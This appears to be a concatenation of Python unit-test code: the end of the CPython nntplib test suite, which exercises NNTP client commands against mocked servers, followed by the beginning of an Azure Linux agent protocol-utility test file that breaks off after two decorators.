class CapsAfterLoginNNTPv2Handler(NNTPv2Handler):
"""A handler that allows CAPABILITIES only after login"""
def handle_CAPABILITIES(self):
if not self._logged_in:
self.push_lit('480 You must log in.')
else:
super().handle_CAPABILITIES()
class ModeSwitchingNNTPv2Handler(NNTPv2Handler):
"""A server that starts in transit mode"""
def __init__(self):
self._switched = False
def handle_CAPABILITIES(self):
fmt = """\
101 Capability list:
VERSION 2 3
IMPLEMENTATION INN 2.5.1
HDR
LIST ACTIVE ACTIVE.TIMES DISTRIB.PATS HEADERS NEWSGROUPS OVERVIEW.FMT
OVER
POST
{}READER
."""
if self._switched:
self.push_lit(fmt.format(''))
else:
self.push_lit(fmt.format('MODE-'))
def handle_MODE(self, what):
assert not self._switched and what == 'reader'
self._switched = True
self.push_lit('200 Posting allowed')
class NNTPv1v2TestsMixin:
def setUp(self):
super().setUp()
def test_welcome(self):
self.assertEqual(self.server.welcome, self.handler.welcome)
def test_authinfo(self):
if self.nntp_version == 2:
self.assertIn('AUTHINFO', self.server._caps)
self.server.login('testuser', 'testpw')
# if AUTHINFO is gone from _caps we also know that getcapabilities()
# has been called after login as it should
self.assertNotIn('AUTHINFO', self.server._caps)
def test_date(self):
resp, date = self.server.date()
self.assertEqual(resp, "111 20100914001155")
self.assertEqual(date, datetime.datetime(2010, 9, 14, 0, 11, 55))
def test_quit(self):
self.assertFalse(self.sio.closed)
resp = self.server.quit()
self.assertEqual(resp, "205 Bye!")
self.assertTrue(self.sio.closed)
def test_help(self):
resp, help = self.server.help()
self.assertEqual(resp, "100 Legal commands")
self.assertEqual(help, [
' authinfo user Name|pass Password|generic <prog> <args>',
' date',
' help',
'Report problems to <root@example.org>',
])
def test_list(self):
resp, groups = self.server.list()
self.assertEqual(len(groups), 6)
g = groups[1]
self.assertEqual(g,
GroupInfo("comp.lang.python.announce", "0000001153",
"0000000993", "m"))
resp, groups = self.server.list("*distutils*")
self.assertEqual(len(groups), 2)
g = groups[0]
self.assertEqual(g,
GroupInfo("gmane.comp.python.distutils.devel", "0000014104",
"0000000001", "m"))
def test_stat(self):
resp, art_num, message_id = self.server.stat(3000234)
self.assertEqual(resp, "223 3000234 <45223423@example.com>")
self.assertEqual(art_num, 3000234)
self.assertEqual(message_id, "<45223423@example.com>")
resp, art_num, message_id = self.server.stat("<45223423@example.com>")
self.assertEqual(resp, "223 0 <45223423@example.com>")
self.assertEqual(art_num, 0)
self.assertEqual(message_id, "<45223423@example.com>")
with self.assertRaises(nntplib.NNTPTemporaryError) as cm:
self.server.stat("<non.existent.id>")
self.assertEqual(cm.exception.response, "430 No Such Article Found")
with self.assertRaises(nntplib.NNTPTemporaryError) as cm:
self.server.stat()
self.assertEqual(cm.exception.response, "412 No newsgroup selected")
def test_next(self):
resp, art_num, message_id = self.server.next()
self.assertEqual(resp, "223 3000237 <668929@example.org> retrieved")
self.assertEqual(art_num, 3000237)
self.assertEqual(message_id, "<668929@example.org>")
def test_last(self):
resp, art_num, message_id = self.server.last()
self.assertEqual(resp, "223 3000234 <45223423@example.com> retrieved")
self.assertEqual(art_num, 3000234)
self.assertEqual(message_id, "<45223423@example.com>")
def test_description(self):
desc = self.server.description("comp.lang.python")
self.assertEqual(desc, "The Python computer language.")
desc = self.server.description("comp.lang.pythonx")
self.assertEqual(desc, "")
def test_descriptions(self):
resp, groups = self.server.descriptions("comp.lang.python")
self.assertEqual(resp, '215 Descriptions in form "group description".')
self.assertEqual(groups, {
"comp.lang.python": "The Python computer language.",
})
resp, groups = self.server.descriptions("comp.lang.python*")
self.assertEqual(groups, {
"comp.lang.python": "The Python computer language.",
"comp.lang.python.announce": "Announcements about the Python language. (Moderated)",
})
resp, groups = self.server.descriptions("comp.lang.pythonx")
self.assertEqual(groups, {})
def test_group(self):
resp, count, first, last, group = self.server.group("fr.comp.lang.python")
self.assertTrue(resp.startswith("211 "), resp)
self.assertEqual(first, 761)
self.assertEqual(last, 1265)
self.assertEqual(count, 486)
self.assertEqual(group, "fr.comp.lang.python")
with self.assertRaises(nntplib.NNTPTemporaryError) as cm:
self.server.group("comp.lang.python.devel")
exc = cm.exception
self.assertTrue(exc.response.startswith("411 No such group"),
exc.response)
def test_newnews(self):
# NEWNEWS comp.lang.python [20]100913 082004
dt = datetime.datetime(2010, 9, 13, 8, 20, 4)
resp, ids = self.server.newnews("comp.lang.python", dt)
expected = (
"230 list of newsarticles (NNTP v{0}) "
"created after Mon Sep 13 08:20:04 2010 follows"
).format(self.nntp_version)
self.assertEqual(resp, expected)
self.assertEqual(ids, [
"<a4929a40-6328-491a-aaaf-cb79ed7309a2@q2g2000vbk.googlegroups.com>",
"<f30c0419-f549-4218-848f-d7d0131da931@y3g2000vbm.googlegroups.com>",
])
# NEWNEWS fr.comp.lang.python [20]100913 082004
dt = datetime.datetime(2010, 9, 13, 8, 20, 4)
resp, ids = self.server.newnews("fr.comp.lang.python", dt)
self.assertEqual(resp, "230 An empty list of newsarticles follows")
self.assertEqual(ids, [])
def _check_article_body(self, lines):
self.assertEqual(len(lines), 4)
self.assertEqual(lines[-1].decode('utf-8'), "-- Signed by André.")
self.assertEqual(lines[-2], b"")
self.assertEqual(lines[-3], b".Here is a dot-starting line.")
self.assertEqual(lines[-4], b"This is just a test article.")
def _check_article_head(self, lines):
self.assertEqual(len(lines), 4)
self.assertEqual(lines[0], b'From: "Demo User" <nobody@example.net>')
self.assertEqual(lines[3], b"Message-ID: <i.am.an.article.you.will.want@example.com>")
def _check_article_data(self, lines):
self.assertEqual(len(lines), 9)
self._check_article_head(lines[:4])
self._check_article_body(lines[-4:])
self.assertEqual(lines[4], b"")
def test_article(self):
# ARTICLE
resp, info = self.server.article()
self.assertEqual(resp, "220 3000237 <45223423@example.com>")
art_num, message_id, lines = info
self.assertEqual(art_num, 3000237)
self.assertEqual(message_id, "<45223423@example.com>")
self._check_article_data(lines)
# ARTICLE num
resp, info = self.server.article(3000234)
self.assertEqual(resp, "220 3000234 <45223423@example.com>")
art_num, message_id, lines = info
self.assertEqual(art_num, 3000234)
self.assertEqual(message_id, "<45223423@example.com>")
self._check_article_data(lines)
# ARTICLE id
resp, info = self.server.article("<45223423@example.com>")
self.assertEqual(resp, "220 0 <45223423@example.com>")
art_num, message_id, lines = info
self.assertEqual(art_num, 0)
self.assertEqual(message_id, "<45223423@example.com>")
self._check_article_data(lines)
# Non-existent id
with self.assertRaises(nntplib.NNTPTemporaryError) as cm:
self.server.article("<non-existent@example.com>")
self.assertEqual(cm.exception.response, "430 No Such Article Found")
def test_article_file(self):
# With a "file" argument
f = io.BytesIO()
resp, info = self.server.article(file=f)
self.assertEqual(resp, "220 3000237 <45223423@example.com>")
art_num, message_id, lines = info
self.assertEqual(art_num, 3000237)
self.assertEqual(message_id, "<45223423@example.com>")
self.assertEqual(lines, [])
data = f.getvalue()
self.assertTrue(data.startswith(
b'From: "Demo User" <nobody@example.net>\r\n'
b'Subject: I am just a test article\r\n'
), ascii(data))
self.assertTrue(data.endswith(
b'This is just a test article.\r\n'
b'.Here is a dot-starting line.\r\n'
b'\r\n'
b'-- Signed by Andr\xc3\xa9.\r\n'
), ascii(data))
def test_head(self):
# HEAD
resp, info = self.server.head()
self.assertEqual(resp, "221 3000237 <45223423@example.com>")
art_num, message_id, lines = info
self.assertEqual(art_num, 3000237)
self.assertEqual(message_id, "<45223423@example.com>")
self._check_article_head(lines)
# HEAD num
resp, info = self.server.head(3000234)
self.assertEqual(resp, "221 3000234 <45223423@example.com>")
art_num, message_id, lines = info
self.assertEqual(art_num, 3000234)
self.assertEqual(message_id, "<45223423@example.com>")
self._check_article_head(lines)
# HEAD id
resp, info = self.server.head("<45223423@example.com>")
self.assertEqual(resp, "221 0 <45223423@example.com>")
art_num, message_id, lines = info
self.assertEqual(art_num, 0)
self.assertEqual(message_id, "<45223423@example.com>")
self._check_article_head(lines)
# Non-existent id
with self.assertRaises(nntplib.NNTPTemporaryError) as cm:
self.server.head("<non-existent@example.com>")
self.assertEqual(cm.exception.response, "430 No Such Article Found")
def test_head_file(self):
f = io.BytesIO()
resp, info = self.server.head(file=f)
self.assertEqual(resp, "221 3000237 <45223423@example.com>")
art_num, message_id, lines = info
self.assertEqual(art_num, 3000237)
self.assertEqual(message_id, "<45223423@example.com>")
self.assertEqual(lines, [])
data = f.getvalue()
self.assertTrue(data.startswith(
b'From: "Demo User" <nobody@example.net>\r\n'
b'Subject: I am just a test article\r\n'
), ascii(data))
self.assertFalse(data.endswith(
b'This is just a test article.\r\n'
b'.Here is a dot-starting line.\r\n'
b'\r\n'
b'-- Signed by Andr\xc3\xa9.\r\n'
), ascii(data))
def test_body(self):
# BODY
resp, info = self.server.body()
self.assertEqual(resp, "222 3000237 <45223423@example.com>")
art_num, message_id, lines = info
self.assertEqual(art_num, 3000237)
self.assertEqual(message_id, "<45223423@example.com>")
self._check_article_body(lines)
# BODY num
resp, info = self.server.body(3000234)
self.assertEqual(resp, "222 3000234 <45223423@example.com>")
art_num, message_id, lines = info
self.assertEqual(art_num, 3000234)
self.assertEqual(message_id, "<45223423@example.com>")
self._check_article_body(lines)
# BODY id
resp, info = self.server.body("<45223423@example.com>")
self.assertEqual(resp, "222 0 <45223423@example.com>")
art_num, message_id, lines = info
self.assertEqual(art_num, 0)
self.assertEqual(message_id, "<45223423@example.com>")
self._check_article_body(lines)
# Non-existent id
with self.assertRaises(nntplib.NNTPTemporaryError) as cm:
self.server.body("<non-existent@example.com>")
self.assertEqual(cm.exception.response, "430 No Such Article Found")
def test_body_file(self):
f = io.BytesIO()
resp, info = self.server.body(file=f)
self.assertEqual(resp, "222 3000237 <45223423@example.com>")
art_num, message_id, lines = info
self.assertEqual(art_num, 3000237)
self.assertEqual(message_id, "<45223423@example.com>")
self.assertEqual(lines, [])
data = f.getvalue()
self.assertFalse(data.startswith(
b'From: "Demo User" <nobody@example.net>\r\n'
b'Subject: I am just a test article\r\n'
), ascii(data))
self.assertTrue(data.endswith(
b'This is just a test article.\r\n'
b'.Here is a dot-starting line.\r\n'
b'\r\n'
b'-- Signed by Andr\xc3\xa9.\r\n'
), ascii(data))
def check_over_xover_resp(self, resp, overviews):
self.assertTrue(resp.startswith("224 "), resp)
self.assertEqual(len(overviews), 3)
art_num, over = overviews[0]
self.assertEqual(art_num, 57)
self.assertEqual(over, {
"from": "Doug Hellmann <doug.hellmann-Re5JQEeQqe8AvxtiuMwx3w@public.gmane.org>",
"subject": "Re: ANN: New Plone book with strong Python (and Zope) themes throughout",
"date": "Sat, 19 Jun 2010 18:04:08 -0400",
"message-id": "<4FD05F05-F98B-44DC-8111-C6009C925F0C@gmail.com>",
"references": "<hvalf7$ort$1@dough.gmane.org>",
":bytes": "7103",
":lines": "16",
"xref": "news.gmane.io gmane.comp.python.authors:57"
})
art_num, over = overviews[1]
self.assertEqual(over["xref"], None)
art_num, over = overviews[2]
self.assertEqual(over["subject"],
"Re: Message d'erreur incompréhensible (par moi)")
def test_xover(self):
resp, overviews = self.server.xover(57, 59)
self.check_over_xover_resp(resp, overviews)
def test_over(self):
# In NNTP "v1", this will fallback on XOVER
resp, overviews = self.server.over((57, 59))
self.check_over_xover_resp(resp, overviews)
sample_post = (
b'From: "Demo User" <nobody@example.net>\r\n'
b'Subject: I am just a test article\r\n'
b'Content-Type: text/plain; charset=UTF-8; format=flowed\r\n'
b'Message-ID: <i.am.an.article.you.will.want@example.com>\r\n'
b'\r\n'
b'This is just a test article.\r\n'
b'.Here is a dot-starting line.\r\n'
b'\r\n'
b'-- Signed by Andr\xc3\xa9.\r\n'
)
def _check_posted_body(self):
# Check the raw body as received by the server
lines = self.handler.posted_body
# One additional line for the "." terminator
self.assertEqual(len(lines), 10)
self.assertEqual(lines[-1], b'.\r\n')
self.assertEqual(lines[-2], b'-- Signed by Andr\xc3\xa9.\r\n')
self.assertEqual(lines[-3], b'\r\n')
self.assertEqual(lines[-4], b'..Here is a dot-starting line.\r\n')
self.assertEqual(lines[0], b'From: "Demo User" <nobody@example.net>\r\n')
def _check_post_ihave_sub(self, func, *args, file_factory):
# First the prepared post with CRLF endings
post = self.sample_post
func_args = args + (file_factory(post),)
self.handler.posted_body = None
resp = func(*func_args)
self._check_posted_body()
# Then the same post with "normal" line endings - they should be
# converted by NNTP.post and NNTP.ihave.
post = self.sample_post.replace(b"\r\n", b"\n")
func_args = args + (file_factory(post),)
self.handler.posted_body = None
resp = func(*func_args)
self._check_posted_body()
return resp
def check_post_ihave(self, func, success_resp, *args):
# With a bytes object
resp = self._check_post_ihave_sub(func, *args, file_factory=bytes)
self.assertEqual(resp, success_resp)
# With a bytearray object
resp = self._check_post_ihave_sub(func, *args, file_factory=bytearray)
self.assertEqual(resp, success_resp)
# With a file object
resp = self._check_post_ihave_sub(func, *args, file_factory=io.BytesIO)
self.assertEqual(resp, success_resp)
# With an iterable of terminated lines
def iterlines(b):
return iter(b.splitlines(keepends=True))
resp = self._check_post_ihave_sub(func, *args, file_factory=iterlines)
self.assertEqual(resp, success_resp)
# With an iterable of non-terminated lines
def iterlines(b):
return iter(b.splitlines(keepends=False))
resp = self._check_post_ihave_sub(func, *args, file_factory=iterlines)
self.assertEqual(resp, success_resp)
def test_post(self):
self.check_post_ihave(self.server.post, "240 Article received OK")
self.handler.allow_posting = False
with self.assertRaises(nntplib.NNTPTemporaryError) as cm:
self.server.post(self.sample_post)
self.assertEqual(cm.exception.response,
"440 Posting not permitted")
def test_ihave(self):
self.check_post_ihave(self.server.ihave, "235 Article transferred OK",
"<i.am.an.article.you.will.want@example.com>")
with self.assertRaises(nntplib.NNTPTemporaryError) as cm:
self.server.ihave("<another.message.id>", self.sample_post)
self.assertEqual(cm.exception.response,
"435 Article not wanted")
def test_too_long_lines(self):
dt = datetime.datetime(2010, 1, 1, 9, 0, 0)
self.assertRaises(nntplib.NNTPDataError,
self.server.newnews, "comp.lang.python", dt)
class NNTPv1Tests(NNTPv1v2TestsMixin, MockedNNTPTestsMixin, unittest.TestCase):
"""Tests an NNTP v1 server (no capabilities)."""
nntp_version = 1
handler_class = NNTPv1Handler
def test_caps(self):
caps = self.server.getcapabilities()
self.assertEqual(caps, {})
self.assertEqual(self.server.nntp_version, 1)
self.assertEqual(self.server.nntp_implementation, None)
class NNTPv2Tests(NNTPv1v2TestsMixin, MockedNNTPTestsMixin, unittest.TestCase):
"""Tests an NNTP v2 server (with capabilities)."""
nntp_version = 2
handler_class = NNTPv2Handler
def test_caps(self):
caps = self.server.getcapabilities()
self.assertEqual(caps, {
'VERSION': ['2', '3'],
'IMPLEMENTATION': ['INN', '2.5.1'],
'AUTHINFO': ['USER'],
'HDR': [],
'LIST': ['ACTIVE', 'ACTIVE.TIMES', 'DISTRIB.PATS',
'HEADERS', 'NEWSGROUPS', 'OVERVIEW.FMT'],
'OVER': [],
'POST': [],
'READER': [],
})
self.assertEqual(self.server.nntp_version, 3)
self.assertEqual(self.server.nntp_implementation, 'INN 2.5.1')
class CapsAfterLoginNNTPv2Tests(MockedNNTPTestsMixin, unittest.TestCase):
"""Tests a probably NNTP v2 server with capabilities only after login."""
nntp_version = 2
handler_class = CapsAfterLoginNNTPv2Handler
def test_caps_only_after_login(self):
self.assertEqual(self.server._caps, {})
self.server.login('testuser', 'testpw')
self.assertIn('VERSION', self.server._caps)
class SendReaderNNTPv2Tests(MockedNNTPWithReaderModeMixin,
unittest.TestCase):
"""Same tests as for v2 but we tell NTTP to send MODE READER to a server
that isn't in READER mode by default."""
nntp_version = 2
handler_class = ModeSwitchingNNTPv2Handler
def test_we_are_in_reader_mode_after_connect(self):
self.assertIn('READER', self.server._caps)
class MiscTests(unittest.TestCase):
def test_decode_header(self):
def gives(a, b):
self.assertEqual(nntplib.decode_header(a), b)
gives("" , "")
gives("a plain header", "a plain header")
gives(" with extra spaces ", " with extra spaces ")
gives("=?ISO-8859-15?Q?D=E9buter_en_Python?=", "Débuter en Python")
gives("=?utf-8?q?Re=3A_=5Bsqlite=5D_probl=C3=A8me_avec_ORDER_BY_sur_des_cha?="
" =?utf-8?q?=C3=AEnes_de_caract=C3=A8res_accentu=C3=A9es?=",
"Re: [sqlite] problème avec ORDER BY sur des chaînes de caractères accentuées")
gives("Re: =?UTF-8?B?cHJvYmzDqG1lIGRlIG1hdHJpY2U=?=",
"Re: problème de matrice")
# A natively utf-8 header (found in the real world!)
gives("Re: Message d'erreur incompréhensible (par moi)",
"Re: Message d'erreur incompréhensible (par moi)")
def test_parse_overview_fmt(self):
# The minimal (default) response
lines = ["Subject:", "From:", "Date:", "Message-ID:",
"References:", ":bytes", ":lines"]
self.assertEqual(nntplib._parse_overview_fmt(lines),
["subject", "from", "date", "message-id", "references",
":bytes", ":lines"])
# The minimal response using alternative names
lines = ["Subject:", "From:", "Date:", "Message-ID:",
"References:", "Bytes:", "Lines:"]
self.assertEqual(nntplib._parse_overview_fmt(lines),
["subject", "from", "date", "message-id", "references",
":bytes", ":lines"])
# Variations in casing
lines = ["subject:", "FROM:", "DaTe:", "message-ID:",
"References:", "BYTES:", "Lines:"]
self.assertEqual(nntplib._parse_overview_fmt(lines),
["subject", "from", "date", "message-id", "references",
":bytes", ":lines"])
# First example from RFC 3977
lines = ["Subject:", "From:", "Date:", "Message-ID:",
"References:", ":bytes", ":lines", "Xref:full",
"Distribution:full"]
self.assertEqual(nntplib._parse_overview_fmt(lines),
["subject", "from", "date", "message-id", "references",
":bytes", ":lines", "xref", "distribution"])
# Second example from RFC 3977
lines = ["Subject:", "From:", "Date:", "Message-ID:",
"References:", "Bytes:", "Lines:", "Xref:FULL",
"Distribution:FULL"]
self.assertEqual(nntplib._parse_overview_fmt(lines),
["subject", "from", "date", "message-id", "references",
":bytes", ":lines", "xref", "distribution"])
# A classic response from INN
lines = ["Subject:", "From:", "Date:", "Message-ID:",
"References:", "Bytes:", "Lines:", "Xref:full"]
self.assertEqual(nntplib._parse_overview_fmt(lines),
["subject", "from", "date", "message-id", "references",
":bytes", ":lines", "xref"])
def test_parse_overview(self):
fmt = nntplib._DEFAULT_OVERVIEW_FMT + ["xref"]
# First example from RFC 3977
lines = [
'3000234\tI am just a test article\t"Demo User" '
'<nobody@example.com>\t6 Oct 1998 04:38:40 -0500\t'
'<45223423@example.com>\t<45454@example.net>\t1234\t'
'17\tXref: news.example.com misc.test:3000363',
]
overview = nntplib._parse_overview(lines, fmt)
(art_num, fields), = overview
self.assertEqual(art_num, 3000234)
self.assertEqual(fields, {
'subject': 'I am just a test article',
'from': '"Demo User" <nobody@example.com>',
'date': '6 Oct 1998 04:38:40 -0500',
'message-id': '<45223423@example.com>',
'references': '<45454@example.net>',
':bytes': '1234',
':lines': '17',
'xref': 'news.example.com misc.test:3000363',
})
# Second example; here the "Xref" field is totally absent (including
# the header name) and comes out as None
lines = [
'3000234\tI am just a test article\t"Demo User" '
'<nobody@example.com>\t6 Oct 1998 04:38:40 -0500\t'
'<45223423@example.com>\t<45454@example.net>\t1234\t'
'17\t\t',
]
overview = nntplib._parse_overview(lines, fmt)
(art_num, fields), = overview
self.assertEqual(fields['xref'], None)
# Third example; the "Xref" is an empty string, while "references"
# is a single space.
lines = [
'3000234\tI am just a test article\t"Demo User" '
'<nobody@example.com>\t6 Oct 1998 04:38:40 -0500\t'
'<45223423@example.com>\t \t1234\t'
'17\tXref: \t',
]
overview = nntplib._parse_overview(lines, fmt)
(art_num, fields), = overview
self.assertEqual(fields['references'], ' ')
self.assertEqual(fields['xref'], '')
def test_parse_datetime(self):
def gives(a, b, *c):
self.assertEqual(nntplib._parse_datetime(a, b),
datetime.datetime(*c))
# Output of DATE command
gives("19990623135624", None, 1999, 6, 23, 13, 56, 24)
# Variations
gives("19990623", "135624", 1999, 6, 23, 13, 56, 24)
gives("990623", "135624", 1999, 6, 23, 13, 56, 24)
gives("090623", "135624", 2009, 6, 23, 13, 56, 24)
def test_unparse_datetime(self):
# Test non-legacy mode
# 1) with a datetime
def gives(y, M, d, h, m, s, date_str, time_str):
dt = datetime.datetime(y, M, d, h, m, s)
self.assertEqual(nntplib._unparse_datetime(dt),
(date_str, time_str))
self.assertEqual(nntplib._unparse_datetime(dt, False),
(date_str, time_str))
gives(1999, 6, 23, 13, 56, 24, "19990623", "135624")
gives(2000, 6, 23, 13, 56, 24, "20000623", "135624")
gives(2010, 6, 5, 1, 2, 3, "20100605", "010203")
# 2) with a date
def gives(y, M, d, date_str, time_str):
dt = datetime.date(y, M, d)
self.assertEqual(nntplib._unparse_datetime(dt),
(date_str, time_str))
self.assertEqual(nntplib._unparse_datetime(dt, False),
(date_str, time_str))
gives(1999, 6, 23, "19990623", "000000")
gives(2000, 6, 23, "20000623", "000000")
gives(2010, 6, 5, "20100605", "000000")
def test_unparse_datetime_legacy(self):
# Test legacy mode (RFC 977)
# 1) with a datetime
def gives(y, M, d, h, m, s, date_str, time_str):
dt = datetime.datetime(y, M, d, h, m, s)
self.assertEqual(nntplib._unparse_datetime(dt, True),
(date_str, time_str))
gives(1999, 6, 23, 13, 56, 24, "990623", "135624")
gives(2000, 6, 23, 13, 56, 24, "000623", "135624")
gives(2010, 6, 5, 1, 2, 3, "100605", "010203")
# 2) with a date
def gives(y, M, d, date_str, time_str):
dt = datetime.date(y, M, d)
self.assertEqual(nntplib._unparse_datetime(dt, True),
(date_str, time_str))
gives(1999, 6, 23, "990623", "000000")
gives(2000, 6, 23, "000623", "000000")
gives(2010, 6, 5, "100605", "000000")
@unittest.skipUnless(ssl, 'requires SSL support')
def test_ssl_support(self):
self.assertTrue(hasattr(nntplib, 'NNTP_SSL'))
class PublicAPITests(unittest.TestCase):
"""Ensures that the correct values are exposed in the public API."""
def test_module_all_attribute(self):
self.assertTrue(hasattr(nntplib, '__all__'))
target_api = ['NNTP', 'NNTPError', 'NNTPReplyError',
'NNTPTemporaryError', 'NNTPPermanentError',
'NNTPProtocolError', 'NNTPDataError', 'decode_header']
if ssl is not None:
target_api.append('NNTP_SSL')
self.assertEqual(set(nntplib.__all__), set(target_api))
class MockSocketTests(unittest.TestCase):
"""Tests involving a mock socket object
Used where the _NNTPServerIO file object is not enough."""
nntp_class = nntplib.NNTP
def check_constructor_error_conditions(
self, handler_class,
expected_error_type, expected_error_msg,
login=None, password=None):
class mock_socket_module:
def create_connection(address, timeout):
return MockSocket()
class MockSocket:
def close(self):
nonlocal socket_closed
socket_closed = True
def makefile(socket, mode):
handler = handler_class()
_, file = make_mock_file(handler)
files.append(file)
return file
socket_closed = False
files = []
with patch('nntplib.socket', mock_socket_module), \
self.assertRaisesRegex(expected_error_type, expected_error_msg):
self.nntp_class('dummy', user=login, password=password)
self.assertTrue(socket_closed)
for f in files:
self.assertTrue(f.closed)
def test_bad_welcome(self):
#Test a bad welcome message
class Handler(NNTPv1Handler):
welcome = 'Bad Welcome'
self.check_constructor_error_conditions(
Handler, nntplib.NNTPProtocolError, Handler.welcome)
def test_service_temporarily_unavailable(self):
#Test service temporarily unavailable
class Handler(NNTPv1Handler):
welcome = '400 Service temporarily unavailable'
self.check_constructor_error_conditions(
Handler, nntplib.NNTPTemporaryError, Handler.welcome)
def test_service_permanently_unavailable(self):
#Test service permanently unavailable
class Handler(NNTPv1Handler):
welcome = '502 Service permanently unavailable'
self.check_constructor_error_conditions(
Handler, nntplib.NNTPPermanentError, Handler.welcome)
def test_bad_capabilities(self):
#Test a bad capabilities response
class Handler(NNTPv1Handler):
def handle_CAPABILITIES(self):
self.push_lit(capabilities_response)
capabilities_response = '201 bad capability'
self.check_constructor_error_conditions(
Handler, nntplib.NNTPReplyError, capabilities_response)
def test_login_aborted(self):
#Test a bad authinfo response
login = 't@e.com'
password = 'python'
class Handler(NNTPv1Handler):
def handle_AUTHINFO(self, *args):
self.push_lit(authinfo_response)
authinfo_response = '503 Mechanism not recognized'
self.check_constructor_error_conditions(
Handler, nntplib.NNTPPermanentError, authinfo_response,
login, password)
class bypass_context:
"""Bypass encryption and actual SSL module"""
def wrap_socket(sock, **args):
return sock
@unittest.skipUnless(ssl, 'requires SSL support')
class MockSslTests(MockSocketTests):
@staticmethod
def nntp_class(*pos, **kw):
return nntplib.NNTP_SSL(*pos, ssl_context=bypass_context, **kw)
class LocalServerTests(unittest.TestCase):
def setUp(self):
sock = socket.socket()
port = socket_helper.bind_port(sock)
sock.listen()
self.background = threading.Thread(
target=self.run_server, args=(sock,))
self.background.start()
self.addCleanup(self.background.join)
self.nntp = NNTP(socket_helper.HOST, port, usenetrc=False).__enter__()
self.addCleanup(self.nntp.__exit__, None, None, None)
def run_server(self, sock):
# Could be generalized to handle more commands in separate methods
with sock:
[client, _] = sock.accept()
with contextlib.ExitStack() as cleanup:
cleanup.enter_context(client)
reader = cleanup.enter_context(client.makefile('rb'))
client.sendall(b'200 Server ready\r\n')
while True:
cmd = reader.readline()
if cmd == b'CAPABILITIES\r\n':
client.sendall(
b'101 Capability list:\r\n'
b'VERSION 2\r\n'
b'STARTTLS\r\n'
b'.\r\n'
)
elif cmd == b'STARTTLS\r\n':
reader.close()
client.sendall(b'382 Begin TLS negotiation now\r\n')
context = ssl.SSLContext()
context.load_cert_chain(certfile)
client = context.wrap_socket(
client, server_side=True)
cleanup.enter_context(client)
reader = cleanup.enter_context(client.makefile('rb'))
elif cmd == b'QUIT\r\n':
client.sendall(b'205 Bye!\r\n')
break
else:
raise ValueError('Unexpected command {!r}'.format(cmd))
@unittest.skipUnless(ssl, 'requires SSL support')
def test_starttls(self):
file = self.nntp.file
sock = self.nntp.sock
self.nntp.starttls()
# Check that the socket and internal pseudo-file really were
# changed.
self.assertNotEqual(file, self.nntp.file)
self.assertNotEqual(sock, self.nntp.sock)
# Check that the new socket really is an SSL one
self.assertIsInstance(self.nntp.sock, ssl.SSLSocket)
# Check that trying starttls when it's already active fails.
self.assertRaises(ValueError, self.nntp.starttls)
if __name__ == "__main__":
unittest.main()
|
test_protocol_util.py
|
# Copyright 2018 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.6+ and Openssl 1.0+
#
import unittest
import os
import tempfile
from multiprocessing import Queue
from threading import Thread
from tests.tools import AgentTestCase, MagicMock, Mock, patch, clear_singleton_instances
from azurelinuxagent.common.exception import *
from azurelinuxagent.common.protocol.metadata_server_migration_util import _METADATA_PROTOCOL_NAME, \
_LEGACY_METADATA_SERVER_TRANSPORT_PRV_FILE_NAME, \
_LEGACY_METADATA_SERVER_TRANSPORT_CERT_FILE_NAME, \
_LEGACY_METADATA_SERVER_P7B_FILE_NAME
from azurelinuxagent.common.protocol.goal_state import TRANSPORT_CERT_FILE_NAME, TRANSPORT_PRV_FILE_NAME
from azurelinuxagent.common.protocol.util import get_protocol_util, ProtocolUtil, PROTOCOL_FILE_NAME, WIRE_PROTOCOL_NAME, ENDPOINT_FILE_NAME
from azurelinuxagent.common.utils.restutil import KNOWN_WIRESERVER_IP
from errno import ENOENT
@patch("time.sleep")
class TestProtocolUtil(AgentTestCase):
MDS_CERTIFICATES = [_LEGACY_METADATA_SERVER_TRANSPORT_PRV_FILE_NAME, \
_LEGACY_METADATA_SERVER_TRANSPORT_CERT_FILE_NAME, \
_LEGACY_METADATA_SERVER_P7B_FILE_NAME]
WIRESERVER_CERTIFICATES = [TRANSPORT_CERT_FILE_NAME, TRANSPORT_PRV_FILE_NAME]
def setUp(self):
super(TestProtocolUtil, self).setUp()
# Since ProtocolUtil is a singleton per thread, we need to clear it to ensure that the test cases do not
# reuse a previous state
clear_singleton_instances(ProtocolUtil)
# Cleanup certificate files, protocol file, and endpoint files
def tearDown(self):
dir = tempfile.gettempdir()
for path in [os.path.join(dir, mds_cert) for mds_cert in TestProtocolUtil.MDS_CERTIFICATES]:
if os.path.exists(path):
os.remove(path)
for path in [os.path.join(dir, ws_cert) for ws_cert in TestProtocolUtil.WIRESERVER_CERTIFICATES]:
if os.path.exists(path):
os.remove(path)
protocol_path = os.path.join(dir, PROTOCOL_FILE_NAME)
if os.path.exists(protocol_path):
os.remove(protocol_path)
endpoint_path = os.path.join(dir, ENDPOINT_FILE_NAME)
if os.path.exists(endpoint_path):
os.remove(endpoint_path)
def test_get_protocol_util_should_return_same_object_for_same_thread(self, _):
protocol_util1 = get_protocol_util()
protocol_util2 = get_protocol_util()
self.assertEqual(protocol_util1, protocol_util2)
def test_get_protocol_util_should_return_different_object_for_different_thread(self, _):
protocol_util_instances = []
errors = []
def get_protocol_util_instance():
try:
protocol_util_instances.append(get_protocol_util())
except Exception as e:
errors.append(e)
t1 = Thread(target=get_protocol_util_instance)
t2 = Thread(target=get_protocol_util_instance)
t1.start()
t2.start()
t1.join()
t2.join()
self.assertEqual(len(protocol_util_instances), 2, "Could not create the expected number of protocols. Errors: [{0}]".format(errors))
self.assertNotEqual(protocol_util_instances[0], protocol_util_instances[1], "The instances created by different threads should be different")
@patch("azurelinuxagent.common.protocol.util.WireProtocol")
def test_detect_protocol(self, WireProtocol, _):
WireProtocol.return_value = MagicMock()
protocol_util = get_protocol_util()
protocol_util.dhcp_handler = MagicMock()
protocol_util.dhcp_handler.endpoint = "foo.bar"
# Test wire protocol is available
protocol = protocol_util.get_protocol()
        self.assertEqual(WireProtocol.return_value, protocol)
# Test wire protocol is not available
protocol_util.clear_protocol()
WireProtocol.return_value.detect.side_effect = ProtocolError()
self.assertRaises(ProtocolError, protocol_util.get_protocol)
@patch("azurelinuxagent.common.conf.get_lib_dir")
@patch("azurelinuxagent.common.protocol.util.WireProtocol")
